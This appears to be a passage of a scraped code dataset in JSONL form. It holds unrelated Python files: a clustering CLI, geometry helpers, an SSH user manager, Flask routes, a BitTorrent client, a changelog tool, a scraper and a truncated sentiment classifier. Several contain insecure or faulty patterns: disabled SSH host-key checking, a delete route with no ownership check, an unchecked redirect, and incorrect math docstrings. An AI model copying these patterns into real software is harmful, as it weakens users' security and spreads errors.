default='cryopicls', type=str, help='Output file root name.'\n )\n return parser\n\n\ndef add_autogmm_parser(subparsers):\n parser_autogmm = add_general_arguments(\n subparsers.add_parser('auto-gmm', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='Gaussian mixture model with automatic cluster number selection based on information criterion values. Build upon the scikit-learn implementation of GMM (https://scikit-learn.org/stable/modules/generated/sklearn.mixture.GaussianMixture.html)')\n )\n group_autogmm = parser_autogmm.add_argument_group('Auto-GMM parameters')\n group_autogmm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_autogmm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_autogmm.add_argument(\n '--criterion', type=str, default='bic', choices=['bic', 'aic'], help='Information criterion for model selection. bic: Bayesian information criterion. aic: Akaike information criterion.'\n )\n group_autogmm.add_argument(\n '--n-init', type=int, default=10, help='The number of initializations to perform for each k. The best result are kept for each k. '\n )\n group_autogmm.add_argument(\n '--covariance-type', type=str, default='full', choices=['full', 'tied', 'diag', 'spherical'], help='Type of covariance parameters to use. \"full\": each component has its own general covariance matrix. \"tied\": all components share the same general covariance matrix. \"diag\": each component has its own diagonal covariance matrix. \"spherical\": each component has its own single variance.'\n )\n group_autogmm.add_argument(\n '--tol', type=float, default=1e-3, help='The convergence threshold. EM iterations will stop when the lower bound average gain is below this threshold.'\n )\n group_autogmm.add_argument(\n '--reg-covar', type=float, default=1e-6, help='Non-negative regularization added to the diagonal of covariance. Allows to assure that the covariance matrices are all positive.'\n )\n group_autogmm.add_argument(\n '--max-iter', type=int, default=100, help='The number of EM iterations to perform.'\n )\n group_autogmm.add_argument(\n '--init-params', type=str, default='kmeans', choices=['kmeans', 'random'], help='The method used to initialize the weights, the means and the precisions(variances) of the components.'\n )\n\n\ndef add_xmeans_parser(subparsers):\n parser_xm = add_general_arguments(\n subparsers.add_parser('x-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='X-Means clustering. Using PyClustering implementation (class pyclustering.cluster.xmeans.xmeans)')\n )\n group_xm = parser_xm.add_argument_group('X-Means parameters')\n group_xm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_xm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_xm.add_argument(\n '--criterion', type=str, default='bic', choices=['bic', 'mndl'], help='Splitting criterion. bic: Bayesian information criterion. mndl: minimum noiseless description length.'\n )\n group_xm.add_argument(\n '--no-ccore', action='store_true', help='Use Python implementation of PyClustering library instead of C++(ccore)'\n )\n group_xm.add_argument(\n '--tolerance', type=float, default=0.025, help='Stop condition for each iteration. If maximum value of change of clusters is less than this value, algorithm will stop processing.'\n )\n group_xm.add_argument(\n '--repeat', type=int, default=10, help='How many times K-Means should be run to improve parameters. With larger repeat values suggesting higher probability of finding global optimum.'\n )\n group_xm.add_argument(\n '--alpha', type=float, default=0.9, help='Parameter distributed [0.0, 1.0] for alpha probabilistic bound. The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.'\n )\n group_xm.add_argument(\n '--beta', type=float, default=0.9, help='Parameter distributed [0.0, 1.0] for beta probabilistic bound. The parameter is used only in case of MNDL splitting criterion, in all other cases this value is ignored.'\n )\n\n\ndef add_kmeans_parser(subparsers):\n parser_km = add_general_arguments(\n subparsers.add_parser('k-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='K-Means clustering. Using scikit-learn implementation (class sklearn.cluster.KMeans)')\n )\n group_km = parser_km.add_argument_group('K-Means parameters')\n group_km.add_argument(\n '--n-clusters', type=int, default=8, help='The number of clusters to form as well as the number of centroids to generate.'\n )\n group_km.add_argument(\n '--init', type=str, default='k-means++', choices=['k-means++', 'random'], help='Method for initialization.'\n )\n group_km.add_argument(\n '--n-init', type=int, default=10, help='Number of time the k-means algorithm will be run with different centroid seeds. The final results will be the best output of n_init consecutive runs in terms of inertia.'\n )\n group_km.add_argument(\n '--max-iter', type=int, default=300, help='Maximum number of iterations of the k-means algorithm for a single run.'\n )\n group_km.add_argument(\n '--tol', type=float, default=1e-4, help='Relative tolerance with regards to Frobenius norm of the difference in the cluster centers of two consecutive iterations to declare convergence.'\n )\n\n\ndef add_gmeans_parser(subparsers):\n parser_gm = add_general_arguments(\n subparsers.add_parser('g-means', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='G-Means clustering. Using PyClustering implementation (class pyclustering.cluster.gmeans.gmeans)')\n )\n group_gm = parser_gm.add_argument_group('G-Means parameters')\n group_gm.add_argument(\n '--k-min', type=int, default=1, help='Minimum number of clusters.'\n )\n group_gm.add_argument(\n '--k-max', type=int, default=20, help='Maximum number of clusters.'\n )\n group_gm.add_argument(\n '--no-ccore', action='store_true', help='Use Python implementation of PyClustering library instead of C++(ccore)'\n )\n group_gm.add_argument(\n '--tolerance', type=float, default=1e-3, help='Stop condition for each K-Means iteration: if maximum value of change of centers of clusters is less than tolerance than algorithm will stop processing.'\n )\n group_gm.add_argument(\n '--repeat', type=int, default=3, help='Stop condition for each iteration. If maximum value of change of clusters is less than this value, algorithm will stop processing.'\n )\n\n\ndef add_manual_select_parser(subparsers):\n parser_manual = add_general_arguments(\n subparsers.add_parser('manual', formatter_class=argparse.ArgumentDefaultsHelpFormatter, help='Manually select data by thresholding. Selected data will be labeled as class 001, and the rest as class 000.')\n )\n group_manual = parser_manual.add_argument_group('Manual select parameters')\n group_manual.add_argument(\n '--thresh', nargs=3, action='append', help='Specify threshold by 3 values. Format: --thresh . This option can be specified multiple times. All the thresholds will be combined with AND.'\n )\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=__doc__\n )\n subparsers = parser.add_subparsers(title='Clustering algorithms', dest='algorithm')\n\n add_autogmm_parser(subparsers)\n add_xmeans_parser(subparsers)\n add_kmeans_parser(subparsers)\n add_gmeans_parser(subparsers)\n add_manual_select_parser(subparsers)\n\n args = parser.parse_args()\n print('##### Command #####\\n\\t' + ' '.join(sys.argv))\n args_print_str = '##### Input parameters #####\\n'\n for opt, val in vars(args).items():\n args_print_str += '\\t{} : {}\\n'.format(opt, val)\n print(args_print_str)\n\n assert args.cryodrgn or args.cryosparc, 'Must specify either --cryodrgn or --cryosparc.'\n assert not (args.cryodrgn and args.cryosparc), '--cryodrgn and --cryosparc cannot be specified at the same time.'\n\n if args.cryodrgn:\n assert args.z_file is not None, 'Must specify --z-file'\n assert os.path.exists(args.z_file), f'--z-file {args.z_file} not found.'\n assert args.metadata is not None, 'Must specify --metadata'\n assert os.path.exists(args.metadata), f'--metadata {args.metadata} not found.'\n\n elif args.cryosparc:\n assert args.threedvar_csg is not None, 'Must specify --threedvar_csg'\n assert os.path.exists(args.threedvar_csg), f'--threedvar-csg {args.threedvar_csg} not found.'\n\n if args.output_dir is None:\n # Defaults to the current directory\n args.output_dir = os.getcwd()\n\n return args\n","sub_path":"cryopicls/args/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":10652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"548990535","text":"import math\n\n\ndef point_distance(point1, point2):\n \"\"\"\n Returns the distance between two points given as tuples\n \"\"\"\n distance = math.sqrt(((point1[0] - point2[0])**2) +\n ((point1[1] - point2[1])**2))\n return distance\n\n\ndef multidimensional_distance(point1, point2):\n \"\"\"\n Return the euclidean distance between two points in multidimensional space \n given as tuples.\n \"\"\"\n # Checks if points are of the same dimension\n if len(point1) != len(point2):\n print('Points of unequal dimensions')\n return None\n\n dist_sq = sum( [(point1[i] - point2[i])**2 for i in range(len(point1))] )\n return math.sqrt(dist_sq)\n\n\ndef find_delta(a, b, c):\n \"\"\"\n Function that returns the delta of a quadratic equation.\n \"\"\"\n\n if a == 0:\n raise ValueError(\"a is 0! [y = ax^2 + bx + c , a != 0]\")\n\n delta = b**2 - 4*a*c\n return delta\n\n\ndef find_vertex(a, b, c):\n \"\"\"\n Function that returns the vertex of a parabola, given three coefficients.\n\n :returns: tuple\n \"\"\"\n\n delta = find_delta(a, b, c)\n\n vertex = ( -b/(2*a), -(delta/(4*a)) )\n return vertex\n\n\ndef find_focus(a, b, c):\n \"\"\"\n Function that returns the focus of a parabola, given three coefficients.\n\n :returns: tuple\n \"\"\"\n\n delta = find_delta(a, b, c)\n\n focus = ( -b/(2*a), (1-delta)/(4*a) )\n return focus\n\n\ndef binomial_coefficient(n, k):\n \"\"\"\n Finds the binomial coefficient, given n and k.\n Equals:\n n! / (k!*(n-1)!)\n \"\"\"\n bin_coeff = (math.factorial(n) // (math.factorial(k) * math.factorial(n - k)))\n return bin_coeff\n\n\ndef quadratic_roots(a, b, c):\n \"\"\"\n Returns a tuple containg the roots of the quadratic equation ax^2+bx+c\n If the roots are imaginary then an error message is displayed and None is returned\n \"\"\"\n D = (b**2) - (4 * a * c)\n if D<0:\n print(\"Imaginary roots\")\n return None\n else:\n num1=-b+(D**(1/2))\n num2=-b-(D**(1/2))\n denum=2*a\n return (num1/denum, num2/denum)\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","sub_path":"src/coordinate_geometry.py","file_name":"coordinate_geometry.py","file_ext":"py","file_size_in_byte":2119,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"105477668","text":"# -*- coding: utf-8 -*-\nfrom __future__ import (absolute_import,unicode_literals)\n \n# Import community modules.\nimport os\nimport sys\nimport json\nimport requests\nfrom subprocess32 import call\nfrom termcolor import cprint\n\n# Import custom modules.\nfrom slen.config import config\n\n\n# Identity controller.\nclass identity(object):\n\n # Initializer.\n def __init__(self,**kwargs):\n self.system = {}\n self.account = {}\n self.user = {}\n self.system['base_home_dir'] = config['system']['base_home_dir']\n self.account['full_domain'] = config['account']['full_domain']\n self.account['scheme'] = config['account']['scheme']\n self.user['api_key_identifier'] = config['user']['api_key_identifier']\n self.user['api_key_token'] = config['user']['api_key_token']\n\n # Setup base home directory.\n def setup_base_home_dir(self):\n try:\n call(['mkdir','-p',self.system['base_home_dir']])\n except Exception as Error:\n cprint('Error setting-up system base home directory.','red')\n sys.exit(1)\n\n # Get Identity.\n def get(self,params):\n params = json.loads(params)\n request = requests.get(\n self.account['scheme']+'://'+self.account['full_domain']+'/API/Stack/'+str(params['stack_id'])+'/Identity/'+str(params['identity_id']),\n headers={'Authorization':'SLEN '+self.user['api_key_identifier']+':'+self.user['api_key_token']}\n )\n response = request.json()\n return {'request':request,'response':response}\n\n # Sync Identity.\n def sync(self,params):\n data = self.get(params)\n if data['request'].status_code==200 and data['response']['status']=='success' and data['response'].has_key('result'):\n identity_data = data['response']['result']['identity']\n if self.exists(identity_data) is True:\n cprint('Identity already exists.','yellow')\n identity_data['home_dir'] = self.system['base_home_dir']+'/'+identity_data['name']\n self.update_keys(identity_data)\n sys.exit(1)\n self.setup_base_home_dir()\n identity_data['home_dir'] = self.system['base_home_dir']+'/'+identity_data['name']\n self.create(identity_data)\n self.configure(identity_data)\n self.update_keys(identity_data)\n else:\n cprint('Error syncing Identity.','red')\n sys.exit(1)\n\n # Rotate Identity keys.\n def rotate_keys(self,params):\n params = json.loads(params)\n request = requests.get(\n self.account['scheme']+'://'+self.account['full_domain']+'/API/Stack/'+str(params['stack_id'])+'/Identity/'+str(params['identity_id'])+'/RotateKeys',\n headers={'Authorization':'SLEN '+self.user['api_key_identifier']+':'+self.user['api_key_token']}\n )\n response = request.json()\n if request.status_code==200 or response['status']=='success':\n cprint('Identity keys rotated.','green')\n else:\n cprint('Error rotating Identity keys.','red')\n sys.exit(1)\n\n # Delete Identity.\n def delete(self,params):\n data = self.get(params)\n if data['request'].status_code==200 and data['response']['status']=='success' and data['response'].has_key('result'):\n identity_data = data['response']['result']['identity']\n if self.exists(identity_data) is False:\n cprint('Identity does not exist.','yellow')\n sys.exit(1)\n self.remove(identity_data)\n else:\n cprint('Error deleting Identity.','red')\n sys.exit(1)\n\n # Check Identity exists.\n def exists(self,data):\n id = call(['id',data['name']])\n if id==0:\n return True\n else:\n return False\n\n # Create Identity.\n def create(self,data):\n try:\n add_user = call(['useradd','-m','-s','/bin/bash','-d',data['home_dir'],data['name']])\n if add_user!=0:\n raise\n call(['chmod','-R','o-rwx',data['home_dir']])\n cprint('Identity created.','green')\n except Exception as Error:\n self.remove(data)\n cprint('Error creating Identity.','red')\n sys.exit(1)\n\n # Configure Identity.\n def configure(self,data):\n try:\n def keys(data):\n call(['touch',data['home_dir']+'/.ssh/authorized_keys'])\n call(['chmod','600',data['home_dir']+'/.ssh/authorized_keys'])\n call(['touch',data['home_dir']+'/.ssh/id_rsa'])\n call(['chmod','400',data['home_dir']+'/.ssh/id_rsa'])\n\n def permission(data):\n call(['chmod','-R','700',data['home_dir']+'/.ssh'])\n\n def ownership(data):\n call(['chown','-R',data['name']+':'+data['name'],data['home_dir']+'/.ssh'])\n\n def settings(data):\n call(['touch',data['home_dir']+'/.ssh/config'])\n config_path = data['home_dir']+'/.ssh/config'\n if os.path.isfile(config_path):\n config_file = open(config_path,'wt')\n config_file.write('Host *\\n\\tStrictHostKeyChecking no\\n')\n config_file.close()\n\n ssh_dir = call(['mkdir',data['home_dir']+'/.ssh'])\n if ssh_dir!=0:\n raise\n permission(data)\n keys(data)\n settings(data)\n ownership(data)\n except Exception as Error:\n self.remove(data)\n cprint('Error configuring Identity.','red')\n sys.exit(1)\n\n # Update Identity keys.\n def update_keys(self,data):\n try:\n authorized_keys = data['home_dir']+'/.ssh/authorized_keys'\n if os.path.isfile(authorized_keys):\n public_key = open(authorized_keys,'wt')\n public_key.write(data['public_key'])\n public_key.close()\n id_rsa = data['home_dir']+'/.ssh/id_rsa'\n if os.path.isfile(id_rsa):\n private_key = open(id_rsa,'wt')\n private_key.write(data['private_key'])\n private_key.close()\n cprint('Identity keys updated.','green')\n except Exception as Error:\n self.remove(data)\n cprint('Error updating Identity keys.','red')\n sys.exit(1)\n\n # Remove Identity.\n def remove(self,data):\n try:\n delete_user = call(['userdel','-r',data['name']])\n if delete_user!=0:\n raise\n except Exception as Error:\n cprint('Error deleting Identity.','red')\n sys.exit(1)\n else:\n cprint('Identity deleted.','green')\n","sub_path":"slen/core/identity.py","file_name":"identity.py","file_ext":"py","file_size_in_byte":6018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"298497485","text":"from flask import render_template, redirect, url_for, request\n \nfrom application import app, db, bcrypt\n\nfrom flask import render_template, redirect, url_for, request, flash\nfrom application.models import Colours, Palettes, Users\nfrom application.forms import UpdatePaletteForm, RegistrationForm, LoginForm, UpdateAccountForm, ColourSearchForm\nfrom flask_login import login_user, current_user, logout_user, login_required\n\n@app.route('/home')\n@app.route(\"/\")\ndef home():\n return render_template('home.html', title='Home')\n\n@app.route('/library', methods=['GET','POST'])\n@login_required\n\ndef library():\n paletteData = Palettes.query.all()\n\n return render_template('library.html', title='Library', Palettes=paletteData)\n\n@app.route('/library/delete/', methods=['GET','POST'])\n@login_required\n\ndef delete_palette(id):\n\n palette_delete = Palettes.query.filter_by(id=id).first()\n\n db.session.delete(palette_delete)\n db.session.commit()\n\n return redirect(url_for('library'))\n\n\n\n@app.route('/update', methods=['GET','POST'])\n@login_required\n\ndef update():\n\n form = ColourSearchForm()\n colour_search = ColourSearchForm(request.form)\n\n if request.method == 'POST':\n palettes = Palettes(colour1=form.select1.data, colour2=form.select2.data, colour3=form.select3.data, user_id=current_user.get_id())\n #print(form.select1.data)\n #print(form.select2.data)\n #print(form.select3.data)\n\n\n db.session.add(palettes)\n db.session.commit()\n\n return redirect(url_for('library'))\n\n else:\n print(form.errors)\n return render_template('create.html', title='Palette', form=form)\n\n# palette= Palettes.query.filter_by(id=form.paletteid.data)()\n\n # form = ColourSearchForm()\n # colour_search = ColourSearchForm(request.form)\n\n # if request.method == 'POST':\n # search = colour_search.data['select']\n\n # db.session.add(Palettes)\n # db.session.commit()\n\n # return render_template('library.html',form=colour_search)\n\n # else:\n # print(form.errors)\n # return render_template('update.html', title='Palette', form=form)\n\n\n\n@app.route('/login',methods=['GET','POST'])\ndef login():\n\n form = LoginForm()\n\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n if form.validate_on_submit():\n\n user=Users.query.filter_by(email=form.email.data).first()\n\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n\n if next_page:\n return redirect(next_page)\n else:\n return redirect(url_for('home'))\n\n return render_template('login.html', title = 'Login',form=form)\n\n\n\n\n@app.route('/register', methods=['GET','POST'])\ndef register():\n\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n\n form = RegistrationForm()\n\n if form.validate_on_submit():\n\n hashed_pw = bcrypt.generate_password_hash(form.password.data)\n\n user = Users(\n first_name=form.first_name.data,\n last_name=form.first_name.data,\n email=form.email.data,\n password=hashed_pw)\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('login'))\n return render_template('register.html', title = 'Register', form=form)\n\n\n@app.route('/create', methods=['GET','POST'])\n@login_required\n\ndef create():\n form = ColourSearchForm()\n colour_search = ColourSearchForm(request.form)\n\n if request.method == 'POST':\n palettes = Palettes(colour1=form.select1.data, colour2=form.select2.data, colour3=form.select3.data, user_id=current_user.get_id())\n #print(form.select1.data)\n #print(form.select2.data)\n #print(form.select3.data)\n\n\n db.session.add(palettes)\n db.session.commit()\n\n return redirect(url_for('library'))\n\n else:\n print(form.errors)\n return render_template('create.html', title='Palette', form=form)\n\n\n#def create():\n\n #form = PaletteForm()\n # if form.validate_on_submit():\n\n #colour1_id = Colours.query.filter_by(colour_name=form.colour1.data).first().id\n #colour2_id = Colours.query.filter_by(colour_name=form.colour2.data).first().id\n # colour3_id = Colours.query.filter_by(colour_name=form.colour3.data).first().id\n\n # palettedata = Palettes(\n #palette_name = form.palette_name.data,\n #colour1 = colour1.data,\n #colour2 = colour2.data,\n #colour3 = colour3.data\n #)\n\n #colour_id = Colours.query.filter_by(colour_name=form.colour_name.data).all()\n\n #db.session.add(palettedata)\n #db.session.commit()\n\n #return redirect(url_for('library'))\n\n #else:\n # print(form.errors)\n # return render_template('create.html', title='Palette', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n\n logout_user()\n\n return redirect(url_for('login'))\n\n@app.route('/account', methods=['GET','POST'])\n@login_required\n\ndef account():\n\n form = UpdateAccountForm()\n\n if form.validate_on_submit():\n\n current_user.first_name = form.first_name.data\n current_user.last_name = form.last_name.data\n current_user.email = form.email.data\n db.session.commit()\n return redirect(url_for('account'))\n\n elif request.method == 'GET':\n form.first_name.data = current_user.first_name\n form.last_name.data = current_user.last_name\n form.email.data = current_user.email\n\n return render_template('account.html', title='Account', form=form)\n\n","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":5684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"597594933","text":"'''\r\npeer class\r\n'''\r\n\r\nimport socket\r\nimport struct\r\nimport hashlib\r\nfrom .log import logging\r\n\r\n__all__ = [\"Peer\"]\r\n\r\nclass Peer(object):\r\n '''\r\n peer object\r\n '''\r\n def __init__(self, ip_port, peer_id, info_hash, pieces_length, pieces_hash, total_length):\r\n self._ip_port = ip_port\r\n self._peer_id = peer_id\r\n self._info_hash = info_hash\r\n self._out_buffer = b\"\"\r\n self._in_buffer = b\"\"\r\n self._pieces_length = pieces_length\r\n self._pieces_hash = pieces_hash\r\n self._total_length = total_length\r\n self._request_index = 0\r\n self._request_begin = 0\r\n self.mysock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self._recv_pieces = [0 for _ in range(len(self._pieces_hash))]\r\n self.mysock.setblocking(0)\r\n self.mysock.connect(self._ip_port)\r\n\r\n def create_handshake(self):\r\n '''\r\n write handshake pack into out_buffer\r\n '''\r\n self._out_buffer += self._create_handshake_pack()\r\n\r\n def _create_handshake_pack(self):\r\n buf = chr(19).encode(\"utf-8\")\r\n buf += \"BitTorrent protocol\".encode(\"utf-8\")\r\n buf += 8*chr(0).encode(\"utf-8\")\r\n buf += self._info_hash\r\n buf += self._peer_id\r\n return buf\r\n\r\n def _check_handshake_response(self, response):\r\n if len(response) < 68:\r\n return False\r\n _offset = 0\r\n pstrlen = struct.unpack_from(\"!B\", response, _offset)[0]\r\n _offset += 1\r\n pstr = struct.unpack_from(\"!19s\", response, _offset)[0]\r\n _offset += 19\r\n _offset += 8\r\n info_hash_response = struct.unpack_from(\"!20s\", response, _offset)[0]\r\n if pstrlen == 19 and pstr == b\"BitTorrent protocol\" and info_hash_response == self._info_hash:\r\n return True\r\n else:\r\n return False\r\n\r\n def _send_interested_info(self):\r\n self._out_buffer += b\"\\x00\\x00\\x00\\x01\\x02\"\r\n\r\n def _send_pieces_request(self):\r\n print(self._pieces_length , self._total_length)\r\n if (self._request_index + 1) * self._pieces_length < self._total_length:\r\n print(self._pieces_length)\r\n self._out_buffer += struct.pack(\">IBIII\", 13, 6, self._request_index, self._request_begin, self._pieces_length)\r\n self._request_index += 1\r\n self._request_begin += self._pieces_length\r\n else:\r\n self._out_buffer += struct.pack(\">IBIII\", 13, 6, self._request_index, self._request_begin, self._total_length - (self._request_begin + 1) * self._pieces_length)\r\n\r\n def _handle_buffer(self):\r\n '''\r\n handle buffer in in_buffer\r\n '''\r\n if self._check_handshake_response(self._in_buffer[:68]):\r\n self._in_buffer = self._in_buffer[68:]\r\n logging.info(\"check the handshake with %s:%d : no error\" % (self._ip_port[0], self._ip_port[1]))\r\n else:\r\n length = struct.unpack(\">I\", self._in_buffer[:4])[0]\r\n if len(self._in_buffer) < int(length) + 4:\r\n return False\r\n if length == 0:\r\n self._in_buffer = b\"\"\r\n return False\r\n type_id = self._in_buffer[4]\r\n if type_id == 5:\r\n logging.info(\"get bitfield!\")\r\n bitfield_buffer = self._in_buffer[5:length + 4]\r\n bin_bitfield_buffer = bin(int(bitfield_buffer.hex(), 16))\r\n if len(self._pieces_hash) == len(bin_bitfield_buffer[2:]):\r\n _offset = 0\r\n for field in bin_bitfield_buffer[2:]:\r\n self._recv_pieces[_offset] = field\r\n _offset += 1\r\n else:\r\n logging.info(\"length error!\")\r\n self._send_interested_info()\r\n elif type_id == 1:\r\n logging.info(\"unchoked!\")\r\n self._send_pieces_request()\r\n elif type_id == 7:\r\n index, begin = struct.unpack(\">II\", self._in_buffer[5:13])\r\n if index == self._request_index and begin == self._request_begin:\r\n print(hashlib.sha1(self._in_buffer[5:]))\r\n print(self._pieces_hash[self._request_index])\r\n else:\r\n print(self._in_buffer)\r\n\r\n self._in_buffer = b\"\"\r\n\r\n def fileno(self):\r\n '''\r\n return sock fileno\r\n '''\r\n return self.mysock.fileno()\r\n\r\n def send_buffer(self):\r\n '''\r\n send out of buffer\r\n '''\r\n buffer_length = len(self._out_buffer)\r\n if buffer_length == 0:\r\n return\r\n logging.info(self._out_buffer)\r\n sent = self.mysock.send(self._out_buffer)\r\n self._out_buffer = self._out_buffer[sent:]\r\n\r\n def receive_buffer(self):\r\n '''\r\n receive server response\r\n '''\r\n res = self.mysock.recv(4096)\r\n if res == b\"\":\r\n return False\r\n self._in_buffer += res\r\n self._handle_buffer()\r\n return True\r\n\r\n\r\n \r\n","sub_path":"service/peer.py","file_name":"peer.py","file_ext":"py","file_size_in_byte":5066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"293851324","text":"\"\"\"\nThe parser module will traverse a git repository, gathering all the commits\nthat follow the AngularJS commit message convention, and linking them with\nthe releases they correspond to.\n\"\"\"\n\nimport git\nfrom typing import Dict, List\n\nfrom .models import Commit, Tag, Unreleased\n\n\ndef create_reverse_tag_index(repo: git.Repo) -> Dict[git.Commit, List[git.TagReference]]:\n \"\"\" Create reverse index \"\"\"\n reverse_tag_index = {}\n for tagref in repo.tags:\n commit = tagref.commit\n if commit not in reverse_tag_index:\n reverse_tag_index[commit] = []\n reverse_tag_index[commit].append(tagref)\n return reverse_tag_index\n\n\ndef group_commits(tags, commits):\n tags = sorted(tags, key=lambda t: t.date)\n\n # Adding the tag's commit manually because those seem to be skipped\n commits.extend([Commit(t._commit) for t in tags])\n\n # Sort the commits and filter out those not formatted correctly\n commits = sorted(commits, key=lambda c: c.date)\n commits = list(filter(lambda c: c.category, commits))\n \n for index, tag in enumerate(tags):\n # Everything is sorted in ascending order (earliest to most recent), \n # So everything before the first tag belongs to that one\n if index == 0:\n children = filter(lambda c: c.date <= tag.date, commits)\n else:\n prev_tag = tags[index-1]\n children = filter(lambda c: prev_tag.date < c.date <= tag.date, commits)\n \n for child in children:\n commits.remove(child)\n tag.add_commit(child)\n \n left_overs = list(filter(lambda c: c.date > tags[-1].date, commits))\n return left_overs\n\n\ndef traverse(base_dir):\n repo = git.Repo(base_dir)\n tags = repo.tags\n\n if len(tags) < 1:\n raise ValueError('Not enough tags to generate changelog')\n\n wrapped_tags = []\n for tagref in tags: \n t = Tag(\n name=tagref.name, \n date=tagref.commit.committed_date, \n commit=tagref.commit)\n wrapped_tags.append(t)\n \n commits = list(repo.iter_commits('master'))\n commits = list(map(Commit, commits)) # Convert to Commit objects\n\n # Iterate through the commits, adding them to a tag's commit list\n # if it belongs to that release\n left_overs = group_commits(wrapped_tags, commits)\n\n # If there are any left over commits (i.e. commits created since \n # the last release\n if left_overs:\n unreleased = Unreleased(left_overs)\n else:\n unreleased = None\n\n return wrapped_tags, unreleased\n\n","sub_path":"auto_changelog/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"373787488","text":"import requests\nimport csv\nfrom multiprocessing import Pool\nfrom time import sleep\n\n\ndef get(url):\n sleep(1)\n r = requests.get(url)\n return r.text\n\n\ndef write_csv(data):\n with open('ws.csv', 'a') as f:\n order = ['name', 'url', 'discription', 'traffic', 'percent']\n writer = csv.DictWriter(f, fieldnames=order)\n writer.writerow(data)\n\ndef get_page_data(text):\n \"\"\"\n Pars data from all text\n :param text: downloaded from website data\n :return: data{}\n\n \"\"\"\n data = text.strip().split('\\n')[1:]\n\n for row in data:\n colums = row.strip().split('\\t')\n print(colums)\n name = colums[0]\n url = colums[1]\n discription = colums[2]\n traffic = colums[3]\n percent = [4]\n\n data = {'name': name,\n 'url': url,\n 'discription': discription,\n 'traffic': traffic,\n 'percent': percent}\n # print(data)\n write_csv(data)\n\n\n\ndef url_to_text(url):\n text = get(url)\n get_page_data(text)\n\n\ndef main():\n #7304\n url = 'https://www.liveinternet.ru/rating/ru//today.tsv?page={}'\n urls = [url.format(str(i)) for i in range(1, 7305)]\n\n with Pool(10) as p:\n p.map(url_to_text, urls)\n\n\n\nif __name__ == '__main__':\n main()","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"266267432","text":"#!python3\r\nimport pyperclip,re\r\ntext=str(pyperclip.paste())\r\n#print(text)\r\nphoneRegx=re.compile(r'''(\r\n1\\d{10}\r\n)''',re.VERBOSE)\r\nphones=''\r\nfor groups in phoneRegx.findall(text):\r\n #print(groups)\r\n phones+=groups+'\\n'\r\npyperclip.copy(phones)","sub_path":"py_files/common/splitPhone.py","file_name":"splitPhone.py","file_ext":"py","file_size_in_byte":248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"503896619","text":"import json\nimport numpy as np\nimport scipy\nimport math\nfrom decimal import Decimal\nfrom scipy.special import comb\nimport scipy.stats\nfrom nltk.stem.porter import *\n\n\nwith open(\"reviews.json\", mode=\"r\", encoding=\"utf-8\") as f:\n reviews = json.load(f)\n\ndef createFreqs(trainSet, type, frequencies):\n for review in trainSet:\n for line in review[\"content\"]:\n for word in line:\n word_exists = False\n word[0] = word[0].lower()\n if word[0] in frequencies:\n word_exists = True\n if not word_exists:\n frequencies[word[0]] = {\"POS\": 0, \"NEG\": 0}\n frequencies[word[0]][type] += 1\n\ndef test(testSet, freqs, logP_c):\n results = {}\n for review in testSet:\n results[review[\"cv\"]] = {\"target\": review[\"sentiment\"], \"logP(POS)\": 0.0, \"logP(NEG)\": 0.0}\n for line in review[\"content\"]:\n for w in line:\n word_exists = False\n w[0] = w[0].lower()\n if w[0] in freqs:\n word_exists = True\n if word_exists:\n results[review[\"cv\"]][\"logP(POS)\"] += freqs[w[0]][\"logP(POS)\"]\n results[review[\"cv\"]][\"logP(NEG)\"] += freqs[w[0]][\"logP(NEG)\"]\n results[review[\"cv\"]][\"logP(POS)\"] += logP_c[\"POS\"]\n results[review[\"cv\"]][\"logP(NEG)\"] += logP_c[\"NEG\"]\n return results\n\n# Calculate prediction accuracy of positive review test set\ndef getAccuracy(testResults):\n correct_count = 0\n decisions = []\n for review in testResults:\n if testResults[review][\"logP(POS)\"] > testResults[review][\"logP(NEG)\"]:\n prediction = \"POS\"\n else:\n prediction = \"NEG\"\n if testResults[review][\"target\"] == prediction:\n correct_count += 1\n decisions.append(\"+\")\n else:\n decisions.append(\"-\")\n accuracy = correct_count / len(testResults)\n return accuracy, decisions\n\nfolds = 10\npos_scores = []\nneg_scores = []\nfor i in range(folds):\n print(\"Test fold is index \" + str(i) + \", \" + str(10+i) + \", \" + str(20+i) + \", ...\")\n train_pos = [review for review in reviews if (review[\"cv\"] % folds != i and review[\"sentiment\"] == \"POS\")]\n train_neg = [review for review in reviews if (review[\"cv\"] % folds != i and review[\"sentiment\"] == \"NEG\")]\n test_pos = [review for review in reviews if (review[\"cv\"] % 